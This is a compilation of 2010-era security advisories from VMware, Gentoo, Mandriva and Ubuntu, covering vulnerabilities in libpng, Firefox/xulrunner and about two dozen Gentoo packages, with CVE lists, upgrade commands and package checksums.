2010-09-23 VMSA-2010-0014 Initial security advisory after release of Workstation 7.1.2, Player 3.1.2 and ACE Management Server 2.7.2 on 2010-09-23
- Contact
E-mail list for product security notifications and announcements: http://lists.vmware.com/cgi-bin/mailman/listinfo/security-announce
This Security Advisory is posted to the following lists:
- security-announce at lists.vmware.com
- bugtraq at securityfocus.com
- full-disclosure at lists.grok.org.uk
E-mail: security at vmware.com PGP key at: http://kb.vmware.com/kb/1055
VMware Security Center http://www.vmware.com/security
VMware Security Advisories http://www.vmware.com/security/advisoiries
VMware security response policy http://www.vmware.com/support/policies/security_response.html
General support life cycle policy http://www.vmware.com/support/policies/eos.html
VMware Infrastructure support life cycle policy http://www.vmware.com/support/policies/eos_vi.html
Copyright 2010 VMware Inc. All rights reserved.
-----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.10 (MingW32)
iEYEARECAAYFAkycSrQACgkQS2KysvBH1xmT9wCfbBUS4GYrJohz+QMLYcoiFmSh eTgAoIAmx+ilbe2myj02daLjFrVQfQII =5jlh -----END PGP SIGNATURE----- . - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 201412-08
http://security.gentoo.org/
Severity: High Title: Multiple packages, Multiple vulnerabilities fixed in 2010 Date: December 11, 2014 Bugs: #159556, #208464, #253822, #259968, #298067, #300375, #300943, #302478, #307525, #307633, #315235, #316697, #319719, #320961, #322457, #325507, #326759, #326953, #329125, #329939, #331421, #332527, #333661 ID: 201412-08
Synopsis
This GLSA contains notification of vulnerabilities found in several Gentoo packages which have been fixed prior to January 1, 2011. Please see the package list and CVE identifiers below for more information.
Background
For more information on the packages listed in this GLSA, please see their homepage referenced in the ebuild.
Affected packages
-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 dev-util/insight < 6.7.1-r1 >= 6.7.1-r1 2 dev-perl/perl-tk < 804.028-r2 >= 804.028-r2 3 dev-util/sourcenav < 5.1.4 >= 5.1.4 4 dev-lang/tk < 8.4.18-r1 >= 8.4.18-r1 5 sys-block/partimage < 0.6.8 >= 0.6.8 6 app-antivirus/bitdefender-console <= 7.1 Vulnerable! 7 net-mail/mlmmj < 1.2.17.1 >= 1.2.17.1 8 sys-apps/acl < 2.2.49 >= 2.2.49 9 x11-apps/xinit < 1.2.0-r4 >= 1.2.0-r4 10 app-arch/gzip < 1.4 >= 1.4 11 app-arch/ncompress < 4.2.4.3 >= 4.2.4.3 12 dev-libs/liblzw < 0.2 >= 0.2 13 media-gfx/splashutils < 1.5.4.3-r3 >= 1.5.4.3-r3 14 sys-devel/m4 < 1.4.14-r1 >= 1.4.14-r1 15 kde-base/kdm < 4.3.5-r1 >= 4.3.5-r1 16 x11-libs/gtk+ < 2.18.7 >= 2.18.7 17 kde-base/kget < 4.3.5-r1 >= 4.3.5-r1 18 app-text/dvipng < 1.13 >= 1.13 19 app-misc/beanstalkd < 1.4.6 >= 1.4.6 20 sys-apps/pmount < 0.9.23 >= 0.9.23 21 sys-auth/pam_krb5 < 4.3 >= 4.3 22 app-text/gv < 3.7.1 >= 3.7.1 23 net-ftp/lftp < 4.0.6 >= 4.0.6 24 www-client/uzbl < 2010.08.05 >= 2010.08.05 25 x11-misc/slim < 1.3.2 >= 1.3.2 26 net-misc/iputils < 20100418 >= 20100418 27 media-tv/dvbstreamer < 1.1-r1 >= 1.1-r1 ------------------------------------------------------------------- NOTE: Certain packages are still vulnerable. Users should migrate to another package if one is available or wait for the existing packages to be marked stable by their architecture maintainers. ------------------------------------------------------------------- 27 affected packages
Description
Vulnerabilities have been discovered in the packages listed below. Please review the CVE identifiers in the Reference section for details.
- Insight
- Perl Tk Module
- Source-Navigator
- Tk
- Partimage
- Mlmmj
- acl
- Xinit
- gzip
- ncompress
- liblzw
- splashutils
- GNU M4
- KDE Display Manager
- GTK+
- KGet
- dvipng
- Beanstalk
- Policy Mount
- pam_krb5
- GNU gv
- LFTP
- Uzbl
- Slim
- Bitdefender Console
- iputils
- DVBStreamer
Impact
A context-dependent attacker may be able to gain escalated privileges, execute arbitrary code, cause Denial of Service, obtain sensitive information, or otherwise bypass security restrictions.
Workaround
There are no known workarounds at this time.
Resolution
All Insight users should upgrade to the latest version:
# emerge --sync # emerge --ask --oneshot --verbose ">=dev-util/insight-6.7.1-r1"
All Perl Tk Module users should upgrade to the latest version:
# emerge --sync # emerge --ask --oneshot --verbose ">=dev-perl/perl-tk-804.028-r2"
All Source-Navigator users should upgrade to the latest version:
# emerge --sync # emerge --ask --oneshot --verbose ">=dev-util/sourcenav-5.1.4"
All Tk users should upgrade to the latest version:
# emerge --sync # emerge --ask --oneshot --verbose ">=dev-lang/tk-8.4.18-r1"
All Partimage users should upgrade to the latest version:
# emerge --sync # emerge --ask --oneshot --verbose ">=sys-block/partimage-0.6.8"
All Mlmmj users should upgrade to the latest version:
# emerge --sync # emerge --ask --oneshot --verbose ">=net-mail/mlmmj-1.2.17.1"
All acl users should upgrade to the latest version:
# emerge --sync # emerge --ask --oneshot --verbose ">=sys-apps/acl-2.2.49"
All Xinit users should upgrade to the latest version:
# emerge --sync # emerge --ask --oneshot --verbose ">=x11-apps/xinit-1.2.0-r4"
All gzip users should upgrade to the latest version:
# emerge --sync # emerge --ask --oneshot --verbose ">=app-arch/gzip-1.4"
All ncompress users should upgrade to the latest version:
# emerge --sync # emerge --ask --oneshot --verbose ">=app-arch/ncompress-4.2.4.3"
All liblzw users should upgrade to the latest version:
# emerge --sync # emerge --ask --oneshot --verbose ">=dev-libs/liblzw-0.2"
All splashutils users should upgrade to the latest version:
# emerge --sync # emerge --ask --oneshot -v ">=media-gfx/splashutils-1.5.4.3-r3"
All GNU M4 users should upgrade to the latest version:
# emerge --sync # emerge --ask --oneshot --verbose ">=sys-devel/m4-1.4.14-r1"
All KDE Display Manager users should upgrade to the latest version:
# emerge --sync # emerge --ask --oneshot --verbose ">=kde-base/kdm-4.3.5-r1"
All GTK+ users should upgrade to the latest version:
# emerge --sync # emerge --ask --oneshot --verbose ">=x11-libs/gtk+-2.18.7"
All KGet 4.3 users should upgrade to the latest version:
# emerge --sync # emerge --ask --oneshot --verbose ">=kde-base/kget-4.3.5-r1"
All dvipng users should upgrade to the latest version:
# emerge --sync # emerge --ask --oneshot --verbose ">=app-text/dvipng-1.13"
All Beanstalk users should upgrade to the latest version:
# emerge --sync # emerge --ask --oneshot --verbose ">=app-misc/beanstalkd-1.4.6"
All Policy Mount users should upgrade to the latest version:
# emerge --sync # emerge --ask --oneshot --verbose ">=sys-apps/pmount-0.9.23"
All pam_krb5 users should upgrade to the latest version:
# emerge --sync # emerge --ask --oneshot --verbose ">=sys-auth/pam_krb5-4.3"
All GNU gv users should upgrade to the latest version:
# emerge --sync # emerge --ask --oneshot --verbose ">=app-text/gv-3.7.1"
All LFTP users should upgrade to the latest version:
# emerge --sync # emerge --ask --oneshot --verbose ">=net-ftp/lftp-4.0.6"
All Uzbl users should upgrade to the latest version:
# emerge --sync # emerge --ask --oneshot --verbose ">=www-client/uzbl-2010.08.05"
All Slim users should upgrade to the latest version:
# emerge --sync # emerge --ask --oneshot --verbose ">=x11-misc/slim-1.3.2"
All iputils users should upgrade to the latest version:
# emerge --sync # emerge --ask --oneshot --verbose ">=net-misc/iputils-20100418"
All DVBStreamer users should upgrade to the latest version:
# emerge --sync # emerge --ask --oneshot --verbose ">=media-tv/dvbstreamer-1.1-r1"
Gentoo has discontinued support for Bitdefender Console. We recommend that users unmerge Bitdefender Console:
# emerge --unmerge "app-antivirus/bitdefender-console"
NOTE: This is a legacy GLSA. Updates for all affected architectures have been available since 2011. It is likely that your system is already no longer affected by these issues.
References
[ 1 ] CVE-2006-3005 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2006-3005 [ 2 ] CVE-2007-2741 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2007-2741 [ 3 ] CVE-2008-0553 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-0553 [ 4 ] CVE-2008-1382 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-1382 [ 5 ] CVE-2008-5907 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-5907 [ 6 ] CVE-2008-6218 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-6218 [ 7 ] CVE-2008-6661 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-6661 [ 8 ] CVE-2009-0040 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-0040 [ 9 ] CVE-2009-0360 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-0360 [ 10 ] CVE-2009-0361 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-0361 [ 11 ] CVE-2009-0946 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-0946 [ 12 ] CVE-2009-2042 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-2042 [ 13 ] CVE-2009-2624 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-2624 [ 14 ] CVE-2009-3736 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3736 [ 15 ] CVE-2009-4029 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-4029 [ 16 ] CVE-2009-4411 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-4411 [ 17 ] CVE-2009-4896 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-4896 [ 18 ] CVE-2010-0001 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-0001 [ 19 ] CVE-2010-0436 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-0436 [ 20 ] CVE-2010-0732 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-0732 [ 21 ] CVE-2010-0829 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-0829 [ 22 ] CVE-2010-1000 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1000 [ 23 ] CVE-2010-1205 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1205 [ 24 ] CVE-2010-1511 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1511 [ 25 ] CVE-2010-2056 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2056 [ 26 ] CVE-2010-2060 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2060 [ 27 ] CVE-2010-2192 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2192 [ 28 ] CVE-2010-2251 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2251 [ 29 ] CVE-2010-2529 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2529 [ 30 ] CVE-2010-2809 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2809 [ 31 ] CVE-2010-2945 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2945
Availability
This GLSA and any updates to it are available for viewing at the Gentoo Security Website:
http://security.gentoo.org/glsa/glsa-201412-08.xml
Concerns?
Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org.
License
Copyright 2014 Gentoo Foundation, Inc; referenced text belongs to its owner(s).
The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5 .
As a precaution htmldoc has been rebuilt to link against the system libpng library for CS4 and 2008.0. Latest xulrunner and mozilla-thunderbird has been patched as a precaution for 2008.0 wheres on 2009.0 and up the the system libpng library is used instead of the bundled copy.
Packages for 2008.0 and 2009.0 are provided as of the Extended Maintenance Program. Please visit this link to learn more: http://store.mandriva.com/product_info.php?cPath=149&products_id=490
The updated packages have been patched to correct these issues.
References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-6218 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1205 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2249
Updated Packages:
Mandriva Linux 2008.0: 4e91a2a256c61f52dffd4fb625e20cf8 2008.0/i586/htmldoc-1.8.27-1.2mdv2008.0.i586.rpm 71553205b1e31d2891667d2eab7aca14 2008.0/i586/htmldoc-nogui-1.8.27-1.2mdv2008.0.i586.rpm 75b6d3f905d7e94154902f81e4728963 2008.0/i586/libpng3-1.2.22-0.5mdv2008.0.i586.rpm fa0c81f2b544f65455a0e0420d9a0e56 2008.0/i586/libpng-devel-1.2.22-0.5mdv2008.0.i586.rpm d4d06a12fd8ee88295877e127757c64b 2008.0/i586/libpng-source-1.2.22-0.5mdv2008.0.i586.rpm 6687d56f95702f0e5786c885ab79c6a9 2008.0/i586/libpng-static-devel-1.2.22-0.5mdv2008.0.i586.rpm 546c18ed8ccf044a45dff3a8cd5ac5b7 2008.0/i586/libxulrunner1.9.2.6-1.9.2.6-0.2mdv2008.0.i586.rpm b428e1202d95d588fb3248c2b2fe8b2f 2008.0/i586/libxulrunner-devel-1.9.2.6-0.2mdv2008.0.i586.rpm b9541da4417ea1150c493aea591509bb 2008.0/i586/mozilla-thunderbird-3.0.5-0.2mdv2008.0.i586.rpm 3389caeeda8b8f272d0e5ed070f075b8 2008.0/i586/mozilla-thunderbird-enigmail-3.0.5-0.2mdv2008.0.i586.rpm 901abb46652fbc19c8e655895181a949 2008.0/i586/nsinstall-3.0.5-0.2mdv2008.0.i586.rpm ad221cd523bff8f4a59037aa05e1442b 2008.0/i586/xulrunner-1.9.2.6-0.2mdv2008.0.i586.rpm d3dbbb58c9832db4edbc45a4023b4477 2008.0/SRPMS/htmldoc-1.8.27-1.2mdv2008.0.src.rpm 885dba7fe0581b37de05d20b838f279a 2008.0/SRPMS/libpng-1.2.22-0.5mdv2008.0.src.rpm 358c49e17d4db735f6862fdbee95a1c9 2008.0/SRPMS/mozilla-thunderbird-3.0.5-0.2mdv2008.0.src.rpm 748ab46a19f1c32808bf3e79429f2211 2008.0/SRPMS/xulrunner-1.9.2.6-0.2mdv2008.0.src.rpm
Mandriva Linux 2008.0/X86_64: 8b2eff5dd89f4ed7e3f120bbc31afa34 2008.0/x86_64/htmldoc-1.8.27-1.2mdv2008.0.x86_64.rpm 15460a7bce68e95d03a87eb14066728b 2008.0/x86_64/htmldoc-nogui-1.8.27-1.2mdv2008.0.x86_64.rpm c7577072f7ab2786a97d7df732b4299a 2008.0/x86_64/lib64png3-1.2.22-0.5mdv2008.0.x86_64.rpm fae36a86aa019cf0fcbcf0d15c508208 2008.0/x86_64/lib64png-devel-1.2.22-0.5mdv2008.0.x86_64.rpm 141ec56a2395ed150acc997eac851429 2008.0/x86_64/lib64png-static-devel-1.2.22-0.5mdv2008.0.x86_64.rpm a29c11e39685931084a085f5716afd5c 2008.0/x86_64/lib64xulrunner1.9.2.6-1.9.2.6-0.2mdv2008.0.x86_64.rpm 3a846b86c758be68420ef05e44cfe717 2008.0/x86_64/lib64xulrunner-devel-1.9.2.6-0.2mdv2008.0.x86_64.rpm 084f3b3d7c68806c7acfc7f3be701f0b 2008.0/x86_64/libpng-source-1.2.22-0.5mdv2008.0.x86_64.rpm c45f7479d93714c46d14f4ae2a5b76bd 2008.0/x86_64/mozilla-thunderbird-3.0.5-0.2mdv2008.0.x86_64.rpm 996e7a6a98997883236b08f6ec5816fa 2008.0/x86_64/mozilla-thunderbird-enigmail-3.0.5-0.2mdv2008.0.x86_64.rpm ecfdba6225b837a7a03c2ddf0d77d07f 2008.0/x86_64/nsinstall-3.0.5-0.2mdv2008.0.x86_64.rpm 394d8e8458e503ed10db7c7b7f742c2b 2008.0/x86_64/xulrunner-1.9.2.6-0.2mdv2008.0.x86_64.rpm d3dbbb58c9832db4edbc45a4023b4477 2008.0/SRPMS/htmldoc-1.8.27-1.2mdv2008.0.src.rpm 885dba7fe0581b37de05d20b838f279a 2008.0/SRPMS/libpng-1.2.22-0.5mdv2008.0.src.rpm 358c49e17d4db735f6862fdbee95a1c9 2008.0/SRPMS/mozilla-thunderbird-3.0.5-0.2mdv2008.0.src.rpm 748ab46a19f1c32808bf3e79429f2211 2008.0/SRPMS/xulrunner-1.9.2.6-0.2mdv2008.0.src.rpm
Mandriva Linux 2009.0: 28b355727c0ef89be1955a18a8c4a1cf 2009.0/i586/libpng3-1.2.31-2.3mdv2009.0.i586.rpm bf33a24dc5144d0c2362e5c7432f9434 2009.0/i586/libpng-devel-1.2.31-2.3mdv2009.0.i586.rpm e331263b8ac75ddad94f6d9d06d9c802 2009.0/i586/libpng-source-1.2.31-2.3mdv2009.0.i586.rpm 921c4ed0268fcb932f52d299ea74a28c 2009.0/i586/libpng-static-devel-1.2.31-2.3mdv2009.0.i586.rpm c43df36b143f834aa7351eb6a9952897 2009.0/SRPMS/libpng-1.2.31-2.3mdv2009.0.src.rpm
Mandriva Linux 2009.0/X86_64: a20b2965684ddb18b2818d618927bb9a 2009.0/x86_64/lib64png3-1.2.31-2.3mdv2009.0.x86_64.rpm df3bbf6f7e959aea3f6065c83ece5321 2009.0/x86_64/lib64png-devel-1.2.31-2.3mdv2009.0.x86_64.rpm 3c8e3469239f93a70ccbcf56ba55cfb6 2009.0/x86_64/lib64png-static-devel-1.2.31-2.3mdv2009.0.x86_64.rpm 740cd4b4cf0d39dd03a26f0b821cfee4 2009.0/x86_64/libpng-source-1.2.31-2.3mdv2009.0.x86_64.rpm c43df36b143f834aa7351eb6a9952897 2009.0/SRPMS/libpng-1.2.31-2.3mdv2009.0.src.rpm
Mandriva Linux 2009.1: 127a1c180703d9c89f5f968d7262c469 2009.1/i586/libpng3-1.2.35-1.2mdv2009.1.i586.rpm 3bbf13f800dcbb5f4ab45ffe898f96ce 2009.1/i586/libpng-devel-1.2.35-1.2mdv2009.1.i586.rpm 2e369ee2602705f601d23a977c82ae8a 2009.1/i586/libpng-source-1.2.35-1.2mdv2009.1.i586.rpm 5784917823e881a4aa997276528bfabe 2009.1/i586/libpng-static-devel-1.2.35-1.2mdv2009.1.i586.rpm 6267ae8a72870fdd2a44962d987a6216 2009.1/SRPMS/libpng-1.2.35-1.2mdv2009.1.src.rpm
Mandriva Linux 2009.1/X86_64: d6032db330f8b8b40af48b29fc6d3730 2009.1/x86_64/lib64png3-1.2.35-1.2mdv2009.1.x86_64.rpm 4aac775bc389d382f184d912ef50b0be 2009.1/x86_64/lib64png-devel-1.2.35-1.2mdv2009.1.x86_64.rpm fb792b3d38cf769590a2dde6ee74c755 2009.1/x86_64/lib64png-static-devel-1.2.35-1.2mdv2009.1.x86_64.rpm 0dfcb358ed06fe83e9621e06189aa8f9 2009.1/x86_64/libpng-source-1.2.35-1.2mdv2009.1.x86_64.rpm 6267ae8a72870fdd2a44962d987a6216 2009.1/SRPMS/libpng-1.2.35-1.2mdv2009.1.src.rpm
Mandriva Linux 2010.0: 76ba7b51c3eda624850a8288bd182afa 2010.0/i586/libpng3-1.2.40-1.2mdv2010.0.i586.rpm 7a936f6a94f33f0e7ffc991ff7b4ed7f 2010.0/i586/libpng-devel-1.2.40-1.2mdv2010.0.i586.rpm abd9ee162933e3208918d3190c76c0af 2010.0/i586/libpng-source-1.2.40-1.2mdv2010.0.i586.rpm bae7010f8e07568c1a9b42e20e7ddebf 2010.0/i586/libpng-static-devel-1.2.40-1.2mdv2010.0.i586.rpm cc04ec15436b892a4e75f1ad18675fb6 2010.0/SRPMS/libpng-1.2.40-1.2mdv2010.0.src.rpm
Mandriva Linux 2010.0/X86_64: 499b5e2707d19becfdab415a8008b122 2010.0/x86_64/lib64png3-1.2.40-1.2mdv2010.0.x86_64.rpm 166ca4d21e39bbb3f250806626c59154 2010.0/x86_64/lib64png-devel-1.2.40-1.2mdv2010.0.x86_64.rpm 1c4b4f2e79cf01a4388a2e395dd64cfa 2010.0/x86_64/lib64png-static-devel-1.2.40-1.2mdv2010.0.x86_64.rpm 88b678c1352aa3ed0fffb04241254128 2010.0/x86_64/libpng-source-1.2.40-1.2mdv2010.0.x86_64.rpm cc04ec15436b892a4e75f1ad18675fb6 2010.0/SRPMS/libpng-1.2.40-1.2mdv2010.0.src.rpm
Mandriva Linux 2010.1: 349ec004acb579d4466b530bfd5fbf3d 2010.1/i586/libpng3-1.2.43-1.1mdv2010.1.i586.rpm d9e323791b16319728fe1486f819e59b 2010.1/i586/libpng-devel-1.2.43-1.1mdv2010.1.i586.rpm 3101d70a79c416392fe228d34b9ba6ff 2010.1/i586/libpng-source-1.2.43-1.1mdv2010.1.i586.rpm 2ff75d1339d52d859939d81994eae477 2010.1/i586/libpng-static-devel-1.2.43-1.1mdv2010.1.i586.rpm 0638fc23b9c5f1f7b3bcd0fdaf71bea8 2010.1/SRPMS/libpng-1.2.43-1.1mdv2010.1.src.rpm
Mandriva Linux 2010.1/X86_64: 80e4392bbe0bd06b392216a6737cd37a 2010.1/x86_64/lib64png3-1.2.43-1.1mdv2010.1.x86_64.rpm 2d7d50b539c63cd1874ed8150d7fb84a 2010.1/x86_64/lib64png-devel-1.2.43-1.1mdv2010.1.x86_64.rpm 5c3793d0bc69db028ec214a6c9f67c1e 2010.1/x86_64/lib64png-static-devel-1.2.43-1.1mdv2010.1.x86_64.rpm 06b83b6f5050410eff5fe8a590972c18 2010.1/x86_64/libpng-source-1.2.43-1.1mdv2010.1.x86_64.rpm 0638fc23b9c5f1f7b3bcd0fdaf71bea8 2010.1/SRPMS/libpng-1.2.43-1.1mdv2010.1.src.rpm
Corporate 4.0: be322ac5f446c26c2d0983a2d37e0c6c corporate/4.0/i586/htmldoc-1.8.23-8.2.20060mlcs4.i586.rpm 71329303eddfd4af0994a708bbe4a119 corporate/4.0/i586/htmldoc-nogui-1.8.23-8.2.20060mlcs4.i586.rpm 1c1036be9452042cd356349d6251b697 corporate/4.0/i586/libpng3-1.2.8-1.8.20060mlcs4.i586.rpm e9ba6c0c604a08f555d99503ba7adb68 corporate/4.0/i586/libpng3-devel-1.2.8-1.8.20060mlcs4.i586.rpm 288d9ca48ea58918bdff316891f3c474 corporate/4.0/i586/libpng3-static-devel-1.2.8-1.8.20060mlcs4.i586.rpm 3aa4084dfc51cf4e8ba252f89d53b220 corporate/4.0/SRPMS/htmldoc-1.8.23-8.2.20060mlcs4.src.rpm b2449f493949c397ac345027783c1216 corporate/4.0/SRPMS/libpng-1.2.8-1.8.20060mlcs4.src.rpm
Corporate 4.0/X86_64: f761706265fcbebd220b16542a742cc9 corporate/4.0/x86_64/htmldoc-1.8.23-8.2.20060mlcs4.x86_64.rpm 79b3189809ad9176401620a41aaa1fcd corporate/4.0/x86_64/htmldoc-nogui-1.8.23-8.2.20060mlcs4.x86_64.rpm e4f9ac99ff42fbc27aae3d8942903043 corporate/4.0/x86_64/lib64png3-1.2.8-1.8.20060mlcs4.x86_64.rpm e26042ead39ce63ed5f4700d2e61e260 corporate/4.0/x86_64/lib64png3-devel-1.2.8-1.8.20060mlcs4.x86_64.rpm 609d6dc1b8a2b5afb029505469844c4f corporate/4.0/x86_64/lib64png3-static-devel-1.2.8-1.8.20060mlcs4.x86_64.rpm 3aa4084dfc51cf4e8ba252f89d53b220 corporate/4.0/SRPMS/htmldoc-1.8.23-8.2.20060mlcs4.src.rpm b2449f493949c397ac345027783c1216 corporate/4.0/SRPMS/libpng-1.2.8-1.8.20060mlcs4.src.rpm
Mandriva Enterprise Server 5: 282337fa9e11a04ef82464c7574591f4 mes5/i586/libpng3-1.2.31-2.3mdvmes5.1.i586.rpm 92c6ec861cf7da08a498576ba412e633 mes5/i586/libpng-devel-1.2.31-2.3mdvmes5.1.i586.rpm c9efa6abde763edff47bf0c1071c9f1a mes5/i586/libpng-source-1.2.31-2.3mdvmes5.1.i586.rpm 2f5340946610590a6baec42354868888 mes5/i586/libpng-static-devel-1.2.31-2.3mdvmes5.1.i586.rpm 488ece2aa6a2c4dc62d4c274d64c2926 mes5/SRPMS/libpng-1.2.31-2.3mdvmes5.1.src.rpm
Mandriva Enterprise Server 5/X86_64: e5f88951d2135de8587d4be94b405ce9 mes5/x86_64/lib64png3-1.2.31-2.3mdvmes5.1.x86_64.rpm 6b89da9eea105e65d7ae3c875c148473 mes5/x86_64/lib64png-devel-1.2.31-2.3mdvmes5.1.x86_64.rpm c1e6715410bbf2081187aef6749b0e3d mes5/x86_64/lib64png-static-devel-1.2.31-2.3mdvmes5.1.x86_64.rpm cb7ef533d9966c8b531cde8a661fc0af mes5/x86_64/libpng-source-1.2.31-2.3mdvmes5.1.x86_64.rpm 488ece2aa6a2c4dc62d4c274d64c2926 mes5/SRPMS/libpng-1.2.31-2.3mdvmes5.1.src.rpm
To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. =========================================================== Ubuntu Security Notice USN-930-4 July 23, 2010 firefox-3.0, firefox-3.5, xulrunner-1.9.2 vulnerabilities CVE-2008-5913, CVE-2010-0654, CVE-2010-1121, CVE-2010-1125, CVE-2010-1196, CVE-2010-1197, CVE-2010-1198, CVE-2010-1199, CVE-2010-1200, CVE-2010-1201, CVE-2010-1202, CVE-2010-1203, CVE-2010-1205, CVE-2010-1206, CVE-2010-1207, CVE-2010-1208, CVE-2010-1209, CVE-2010-1210, CVE-2010-1211, CVE-2010-1212, CVE-2010-1213, CVE-2010-1214, CVE-2010-1215, CVE-2010-2751, CVE-2010-2752, CVE-2010-2753, CVE-2010-2754 ===========================================================
A security issue affects the following Ubuntu releases:
Ubuntu 9.04 Ubuntu 9.10
This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu.
The problem can be corrected by upgrading your system to the following package versions:
Ubuntu 9.04: abrowser 3.6.7+build2+nobinonly-0ubuntu0.9.04.1 firefox-3.0 3.6.7+build2+nobinonly-0ubuntu0.9.04.1 xulrunner-1.9.2 1.9.2.7+build2+nobinonly-0ubuntu0.9.04.2
Ubuntu 9.10: firefox-3.5 3.6.7+build2+nobinonly-0ubuntu0.9.10.1 xulrunner-1.9.2 1.9.2.7+build2+nobinonly-0ubuntu0.9.10.2
Mozilla has changed the support model for Firefox and they no longer support version 3.0 of the browser and will only support version 3.5 of the browser for a while longer. As a result, Ubuntu is providing an upgrade to Firefox 3.6 for Ubuntu 9.04 and 9.10 users, which is the most current stable release of Firefox supported by Mozilla. When upgrading, users should be aware of the following:
- Firefox 3.6 does not support version 5 of the Sun Java plugin. Please use icedtea6-plugin or sun-java6-plugin instead.
- After upgrading to Firefox 3.6.6, users may be prompted to upgrade 3rd party Add-Ons. In some cases, an Add-On will not be compatible with Firefox 3.6.6 and have no update available. In these cases, Firefox will notify the user that it is disabling the Add-On.
- Font configuration cannot be controlled via Gnome settings. This is a known issue being tracked in https://launchpad.net/bugs/559149 and will be fixed in a later update.
- helix-player is not currently supported in Firefox 3.6. This is a known issue and may be fixed in a future update.
- Plugins using external helpers (such as Totem) may not close when using the Epiphany browser. This is a known issue being tracked in https://launchpad.net/bugs/599796 and will be fixed in a later update. This issue only affects Ubuntu 9.04.
- The OpenJDK java plugin is not available in Ubuntu 9.04 on Sparc hardware. This will be fixed in a future update.
After a standard system upgrade you need to restart Firefox and any applications that use Xulrunner to effect the necessary changes.
Details follow:
USN-930-1 fixed vulnerabilities in Firefox and Xulrunner. This update provides the corresponding updates for Ubuntu 9.04 and 9.10, along with additional updates affecting Firefox 3.6.6.
Several flaws were discovered in the browser engine of Firefox. If a user were tricked into viewing a malicious site, a remote attacker could use this to crash the browser or possibly run arbitrary code as the user invoking the program. (CVE-2010-1208, CVE-2010-1209, CVE-2010-1211, CVE-2010-1212)
An integer overflow was discovered in how Firefox processed plugin parameters. An attacker could exploit this to crash the browser or possibly run arbitrary code as the user invoking the program. (CVE-2010-1214)
A flaw was discovered in the Firefox JavaScript engine. If a user were tricked into viewing a malicious site, a remote attacker code execute arbitrary JavaScript with chrome privileges. (CVE-2010-1215)
An integer overflow was discovered in how Firefox processed CSS values. An attacker could exploit this to crash the browser or possibly run arbitrary code as the user invoking the program. (CVE-2010-2752)
An integer overflow was discovered in how Firefox interpreted the XUL element. If a user were tricked into viewing a malicious site, a remote attacker could use this to crash the browser or possibly run arbitrary code as the user invoking the program. (CVE-2010-2753)
Aki Helin discovered that libpng did not properly handle certain malformed PNG images. If a user were tricked into opening a crafted PNG file, an attacker could cause a denial of service or possibly execute arbitrary code with the privileges of the user invoking the program. (CVE-2010-1205)
Yosuke Hasegawa and Vladimir Vukicevic discovered that the same-origin check in Firefox could be bypassed by utilizing the importScripts Web Worker method. If a user were tricked into viewing a malicious website, an attacker could exploit this to read data from other domains. (CVE-2010-1213, CVE-2010-1207)
O. Andersen that Firefox did not properly map undefined positions within certain 8 bit encodings. An attacker could utilize this to perform cross-site scripting attacks. (CVE-2010-1210)
Michal Zalewski discovered flaws in how Firefox processed the HTTP 204 (no content) code. An attacker could exploit this to spoof the location bar, such as in a phishing attack. (CVE-2010-1206)
Jordi Chancel discovered that Firefox did not properly handle when a server responds to an HTTPS request with plaintext and then processes JavaScript history events. An attacker could exploit this to spoof the location bar, such as in a phishing attack. (CVE-2010-2751)
Chris Evans discovered that Firefox did not properly process improper CSS selectors. If a user were tricked into viewing a malicious website, an attacker could exploit this to read data from other domains. (CVE-2010-0654)
Soroush Dalili discovered that Firefox did not properly handle script error output. An attacker could use this to access URL parameters from other domains. (CVE-2010-2754)
Original advisory details:
If was discovered that Firefox could be made to access freed memory. If a user were tricked into viewing a malicious site, a remote attacker could cause a denial of service or possibly execute arbitrary code with the privileges of the user invoking the program. (CVE-2010-1121)
Several flaws were discovered in the browser engine of Firefox. If a user were tricked into viewing a malicious site, a remote attacker could cause a denial of service or possibly execute arbitrary code with the privileges of the user invoking the program. (CVE-2010-1200, CVE-2010-1201, CVE-2010-1202, CVE-2010-1203)
